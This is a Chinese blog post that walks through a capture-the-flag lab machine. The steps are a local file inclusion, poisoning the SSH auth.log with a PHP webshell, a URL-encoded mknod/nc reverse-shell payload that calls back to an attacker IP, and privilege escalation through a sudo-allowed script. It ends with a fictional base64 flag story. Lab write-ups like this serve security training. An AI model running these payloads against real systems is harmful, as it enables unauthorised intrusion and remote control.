首页 > 其他分享 >渗透测试(三)- evilscience靶机

渗透测试(三)- evilscience靶机

时间:2024-11-30 16:30:31浏览次数:10  
标签:October log 渗透 py been evilscience 靶机 2017 first

靶机地址:

通过百度网盘分享的文件:theEther_1.0.1.zip
链接:https://pan.baidu.com/s/1v4aFYA6jH8Uotm866pVHBg?pwd=v5f9 
提取码:v5f9 
--来自百度网盘超级会员V1的分享

实现步骤:

探测目标靶机IP地址

使用nmap扫描目标IP,发现目标靶机开放了22,80端口

访问网页192.168.111.129

查看网页源码发现没有可用信息,接着使用dirsearch扫描目录

没有发现有用的目录,再使用dirbuster扫描

访问一下80端口发现顶部有几个链接,点击发现是通过传参方式显示了页面,看到“index.php?file=”,很大可能存在文件包含漏洞

拼接/var/log/lastlog  页面会出现乱码

拼接/var/log/auth.log,有返回

利用ssh错误日志写入一句话木马

auth.log文件是我们尝试连接服务器时生成日志。那么就可以利用这个功能,发送恶意PHP代码将恶意代码作为新日志自动添加到auth.log文件中。先看一下phpinfo是否能成功利用

反弹shell

需要进行编码绕过

mknod+backpipe+p+%26%26+nc+192.168.111.111+9999+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe

在kali中打开监听后,成功连接

python -c 'import pty;pty.spawn("/bin/bash")'

生成新的终端

查看是否属于sudo组,发现可以使用sudo权限,且不需要密码执行xxxlogauditorxxx.py文件

查看是否存在可提权SUID

find / -perm -u=s -type f 2>/dev/null

发现可以通过这个脚本执行命令,随后输入命令,提权成功

使用sudo权限不需要密码执行xxxlogauditorxxx.py,查看py文件的内容发现里边有很大一部分内容使用了base64编码;将xxxlogauditorxxx.py拷贝网网站目录下,使用wget下载查看py文件的内容

下载图片

wget http://192.168.232.200/?file=flag.png

查看图片发现字符串

flag: b2N0b2JlciAxLCAyMDE3LgpXZSBoYXZlIG9yIGZpcnN0IGJhdGNoIG9mIHZvbHVudGVlcnMgZm9yIHRoZSBnZW5vbWUgcHJvamVjdC4gVGhlIGdyb3VwIGxvb2tzIHByb21pc2luZywgd2UgaGF2ZSBoaWdoIGhvcGVzIGZvciB0aGlzIQoKT2N0b2JlciAzLCAyMDE3LgpUaGUgZmlyc3QgaHVtYW4gdGVzdCB3YXMgY29uZHVjdGVkLiBPdXIgc3VyZ2VvbnMgaGF2ZSBpbmplY3RlZCBhIGZlbWFsZSBzdWJqZWN0IHdpdGggdGhlIGZpcnN0IHN0cmFpbiBvZiBhIGJlbmlnbiB2aXJ1cy4gTm8gcmVhY3Rpb25zIGF0IHRoaXMgdGltZSBmcm9tIHRoaXMgcGF0aWVudC4KCk9jdG9iZXIgMywgMjAxNy4KU29tZXRoaW5nIGhhcyBnb25lIHdyb25nLiBBZnRlciBhIGZldyBob3VycyBvZiBpbmplY3Rpb24sIHRoZSBodW1hbiBzcGVjaW1lbiBhcHBlYXJzIHN5bXB0b21hdGljLCBleGhpYml0aW5nIGRlbWVudGlhLCBoYWxsdWNpbmF0aW9ucywgc3dlYXRpbmcsIGZvYW1pbmcgb2YgdGhlIG1vdXRoLCBhbmQgcmFwaWQgZ3Jvd3RoIG9mIGNhbmluZSB0ZWV0aCBhbmQgbmFpbHMuCgpPY3RvYmVyIDQsIDIwMTcuCk9ic2VydmluZyBvdGhlciBjYW5kaWRhdGVzIHJlYWN0IHRvIHRoZSBpbmplY3Rpb25zLiBUaGUgZXRoZXIgc2VlbXMgdG8gd29yayBmb3Igc29tZSBidXQgbm90IGZvciBvdGhlcnMuIEtlZXBpbmcgY2xvc2Ugb2JzZXJ2YXRpb24gb24gZmVtYWxlIHNwZWNpbWVuIG9uIE9jdG9iZXIgM3JkLgoKT2N0b2JlciA3LCAyMDE3LgpUaGUgZmlyc3QgZmxhdGxpbmUgb2YgdGhlIHNlcmllcyBvY2N1cnJlZC4gVGhlIGZlbWFsZSBzdWJqZWN0IHBhc3NlZC4gQWZ0ZXIgZGVjcmVhc2luZywgbXVzY2xlIGNvbnRyYWN0aW9ucyBhbmQgbGlmZS1saWtlIGJlaGF2aW9ycyBhcmUgc3RpbGwgdmlzaWJsZS4gVGhpcyBpcyBpbXBvc3NpYmxlISBTcGVjaW1lbiBoYXMgYmVlbiBtb3ZlZCB0byBhIGNvbnRhaW5tZW50IHF1YXJhbnRpbmUgZm9yIGZ1cnRoZXIgZXZhbHVhdGlvbi4KCk9jdG9iZXIgOCwgMjAxNy4KT3RoZXIgY2FuZGlkYXRlcyBhcmUgYmVnaW5uaW5nIHRvIGV4aGliaXQgc2ltaWxhciBzeW1wdG9tcyBhbmQgcGF0dGVybnMgYXMgZmVtYWxlIHNwZWNpbWVuLiBQbGFubmluZyB0byBtb3ZlIHRoZW0gdG8gcXVhcmFudGluZSBhcyB3ZWxsLgoKT2N0b2JlciAxMCwgMjAxNy4KSXNvbGF0ZWQgYW5kIGV4cG9zZWQgc3ViamVjdCBhcmUgZGVhZCwgY29sZCwgbW92aW5nLCBnbmFybGluZywgYW5kIGF0dHJhY3RlZCB0byBmbGVzaCBhbmQvb3IgYmxvb2QuIENhbm5pYmFsaXN0aWMtbGlrZSBiZWhhdmlvdXIgZGV0ZWN0ZWQuIEFuIGFudGlkb3RlL3ZhY2NpbmUgaGFzIGJlZW4gcHJvcG9zZWQuCgpPY3RvYmVyIDExLCAyMDE3LgpIdW5kcmVkcyBvZiBwZW9wbGUgaGF2ZSBiZWVuIGJ1cm5lZCBhbmQgYnVyaWVkIGR1ZSB0byB0aGUgc2lkZSBlZmZlY3RzIG9mIHRoZSBldGhlci4gVGhlIGJ1aWxkaW5nIHdpbGwgYmUgYnVybmVkIGFsb25nIHdpdGggdGhlIGV4cGVyaW1lbnRzIGNvbmR1Y3RlZCB0byBjb3ZlciB1cCB0aGUgc3RvcnkuCgpPY3RvYmVyIDEzLCAyMDE3LgpXZSBoYXZlIGRlY2lkZWQgdG8gc3RvcCBjb25kdWN0aW5nIHRoZXNlIGV4cGVyaW1lbnRzIGR1ZSB0byB0aGUgbGFjayBvZiBhbnRpZG90ZSBvciBldGhlci4gVGhlIG1haW4gcmVhc29uIGJlaW5nIHRoZSBudW1lcm91cyBkZWF0aCBkdWUgdG8gdGhlIHN1YmplY3RzIGRpc3BsYXlpbmcgZXh0cmVtZSByZWFjdGlvbnMgdGhlIHRoZSBlbmdpbmVlcmVkIHZpcnVzLiBObyBwdWJsaWMgYW5ub3VuY2VtZW50IGhhcyBiZWVuIGRlY2xhcmVkLiBUaGUgQ0RDIGhhcyBiZWVuIHN1c3BpY2lvdXMgb2Ygb3VyIHRlc3RpbmdzIGFuZCBhcmUgY29uc2lkZXJpbmcgbWFydGlhbCBsYXdzIGluIHRoZSBldmVudCBvZiBhbiBvdXRicmVhayB0byB0aGUgZ2VuZXJhbCBwb3B1bGF0aW9uLgoKLS1Eb2N1bWVudCBzY2hlZHVsZWQgdG8gYmUgc2hyZWRkZWQgb24gT2N0b2JlciAxNXRoIGFmdGVyIFBTQS4K

通过base64解码得到flag

october 1, 2017.

We have or first batch of volunteers for the genome project. The group looks promising, we have high hopes for this!

October 3, 2017.

The first human test was conducted. Our surgeons have injected a female subject with the first strain of a benign virus. No reactions at this time from this patient.

October 3, 2017.

Something has gone wrong. After a few hours of injection, the human specimen appears symptomatic, exhibiting dementia, hallucinations, sweating, foaming of the mouth, and rapid growth of canine teeth and nails.

October 4, 2017.

Observing other candidates react to the injections. The ether seems to work for some but not for others. Keeping close observation on female specimen on October 3rd.

October 7, 2017.

The first flatline of the series occurred. The female subject passed. After decreasing, muscle contractions and life-like behaviors are still visible. This is impossible! Specimen has been moved to a containment quarantine for further evaluation.

October 8, 2017.

Other candidates are beginning to exhibit similar symptoms and patterns as female specimen. Planning to move them to quarantine as well.

October 10, 2017.

Isolated and exposed subject are dead, cold, moving, gnarling, and attracted to flesh and/or blood. Cannibalistic-like behaviour detected. An antidote/vaccine has been proposed.

October 11, 2017.

Hundreds of people have been burned and buried due to the side effects of the ether. The building will be burned along with the experiments conducted to cover up the story.

October 13, 2017.

We have decided to stop conducting these experiments due to the lack of antidote or ether. The main reason being the numerous death due to the subjects displaying extreme reactions the the engineered virus. No public announcement has been declared. The CDC has been suspicious of our testings and are considering martial laws in the event of an outbreak to the general population.

--Document scheduled to be shredded on October 15th after PSA.

标签:October,log,渗透,py,been,evilscience,靶机,2017,first
From: https://blog.csdn.net/weixin_72060499/article/details/144156083

相关文章

  • 渗透测试(五)- prime_Series靶机攻略
    靶机地址:通过百度网盘分享的文件:Prime_Series_Level-1.rar链接:https://pan.baidu.com/s/10ibEa4y6C8lKRsTHY1ROTw?pwd=a6cr 提取码:a6cr --来自百度网盘超级会员V1的分享实现步骤:主机发现,使用arp-scan-l命令扫描局域网内存在的设备发现了192.168.111.4的靶机IP地址......
  • Chili靶机渗透
    获取ip:获取端口号:可以看到不存在ssh服务了,但是存在ftp和http服务:扫描一下http服务:访问网址:查看源代码只发现一个标题:扫描一下目录信息:没有扫描到什么东西,换一个密码本:gobuster:也是没有什么东西,就尝试爆破一下ftp:爆破到密码和用户:尝试登录:登录成功那么就......
  • #渗透测试#红蓝对抗#Src漏洞挖掘 介绍-Yakit(4)
    http://127.0.0.1:80免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。书接上回:目录Yakit中的专项漏洞检测......
  • Vulnhub-Earth靶机笔记
    Earth靶机笔记概述这是一台Vulnhub的靶机,主要是Earth靶机地址:https://vulnhub.com/entry/the-planets-earth,755/#download一、nmap扫描1、端口扫描-sT以TCP全连接扫描,--min-rate10000以最低10000速率进行扫描,-p-进行全端口扫描,-oports结果输出到ports文件......
  • #渗透测试#SRC漏洞挖掘#护网#密探渗透测试工具讲解使用
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。目录01项目地址02项目介绍03更新日志04如何运行​编......
  • 渗透测试怎么做?看看大神一次完整的渗透测试实战
    大家好,我是程序员晓晓渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵!渗透测试的前提是我们得经过用户的授权,才可以......
  • 4-CSRF漏洞渗透与防御
    1、什么是CSRF漏洞Cross-SiteRequestForgery跨站请求伪造从一个第三方的网站,利用其他网站生效的cookie,直接请求服务器的某一个接口,导致攻击发生!2、CSRF案例分析GmailCSRF漏洞(设置邮件转发)WeiboCSRF漏洞(自动关注账号)2.1CSRF漏洞危害例如:修改账号信息利用管理员账......
  • 3-XSS渗透与防御
    1、HTTP协议回顾XSS又名跨站脚本攻击web页面登陆页面,往往有一个“记住密码”功能--->Cookie1.1HTTP流程1.2HTTP特点:请求应答模式灵活可拓展可靠传输无状态stateless--客户端每次请求都是完全独立的,没有任何联系2、客户端的Cookie显示:每个请求都是独立的需求......
  • 【建议收藏】渗透测试零基础入门教程,全程干货!
    转眼间,从大三开始学安全,到现在也有五年了,也算是对渗透测试有一定理解,公众号准备出一些入门教程,以实操为主,希望可以帮助到想入门渗透测试的小白。如果觉得有用,可以在文章后面支持一下我,作为我写下去的动力。1.什么是渗透测试渗透测试就是模拟真实黑客的攻击手法对目标网站或......
  • 【2024寒假全新】渗透测试工具大全(超详细),收藏这一篇就够了!
     黑客/网安大礼包:......